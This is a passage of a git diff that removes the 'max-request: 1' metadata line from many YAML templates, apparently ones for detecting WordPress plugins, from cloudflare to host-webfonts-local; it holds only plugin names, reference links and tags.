https://wordpress.org/plugins/cloudflare/ metadata: - max-request: 1 plugin_namespace: cloudflare wpscan: https://wpscan.com/plugin/cloudflare tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 1fad3cee08..c3b630cde2 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: - max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index ebe4ee41a7..5c8ce709b6 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: - max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 5c32110e0e..aea47b9e84 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: - max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 09c2e2f360..78c584c388 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: - max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 1a2e8beb3e..2c80d09c27 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: - max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 706145493c..4b1b3a8754 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: - max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index cf6a6ee635..06ad83bdf7 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: - max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index c039765929..b20666268f 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: - max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index a2c92dff4b..b2a097bfe7 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: - max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 41b5d6c854..c71fa258af 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: - max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index cca31cc3a9..5a98e67597 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: - max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index ff9c0a49ce..4463174203 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: - max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a76d3306bb..cfac0b961b 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: - max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 2249681b6d..846761f2f7 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: - max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index b5389b27c9..0def6e61ca 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: - max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 00d183f507..5c5decc127 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: - max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 451e1daef1..a8229a338e 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: - max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index af30ca76b6..6559e64dce 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: - max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 93823466d4..a4368b8aa6 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: - max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index e224283ecd..ec119e762a 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: - max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 9af8df08a7..b7ec7576a3 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: - max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index d4081474c3..c42d679973 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: - max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index bcbc0707fb..fc44375947 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: - max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 3d0073b5a5..58d5c881d0 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: - max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index f0c3e4bc63..6cfb8bc272 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: - max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index eab4a0d725..9caaa53263 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: - max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 74c172ac94..5e6b557952 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: - max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index f5a63a2ed2..c5a665e6f7 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: - max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 25ca7328ef..a8b56b5df0 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: - max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index cb1db5bee6..4e20e57107 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: - max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index a3207ea16a..6f6a416595 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a4b772078..2dd0ef57b5 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: - max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 366205085d..11942f4fa4 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: - max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 598f08ce88..87c2aeb4bd 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: - max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 42cdfb4475..3696eefbf7 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: - max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index a1af263dbd..8bab0a9c3e 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: - max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 19265f910e..affd270123 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c21d414695..1e6a62e23b 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: - max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 91c89d0ad8..980265f531 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: - max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 539d9f7cec..daf205789d 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: - max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index f4123bb594..22bfa3ffe2 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: - max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 254f916291..7ed171d662 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: - max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 8074ac337e..ad238445fc 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: - max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 575c9ebe67..840c086fb9 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: - max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 7b0f188ff7..2678f603c6 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: - max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 898e4de56d..20d947a5d1 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: - max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 4a76856a69..22ee97b51f 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: - max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index b321ca63eb..3f4c6c8936 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: - max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 2b42c9f80c..fa1bb64115 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: - max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml index 2409c6b370..a8eca7b056 100644 --- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml +++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-and-footer-scripts/ metadata: - max-request: 1 plugin_namespace: header-and-footer-scripts wpscan: https://wpscan.com/plugin/header-and-footer-scripts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index dbea07a6da..da63d1cbf6 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: - max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 17a8f220cf..f94e7f6494 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: - max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 956a08b32d..95d2aa5f16 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: - max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 5a570b9077..af8193b875 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: - max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 4ecac0cd92..8d7e45818b 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: - max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index e50f58cef8..ed3967db7b 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: - max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml 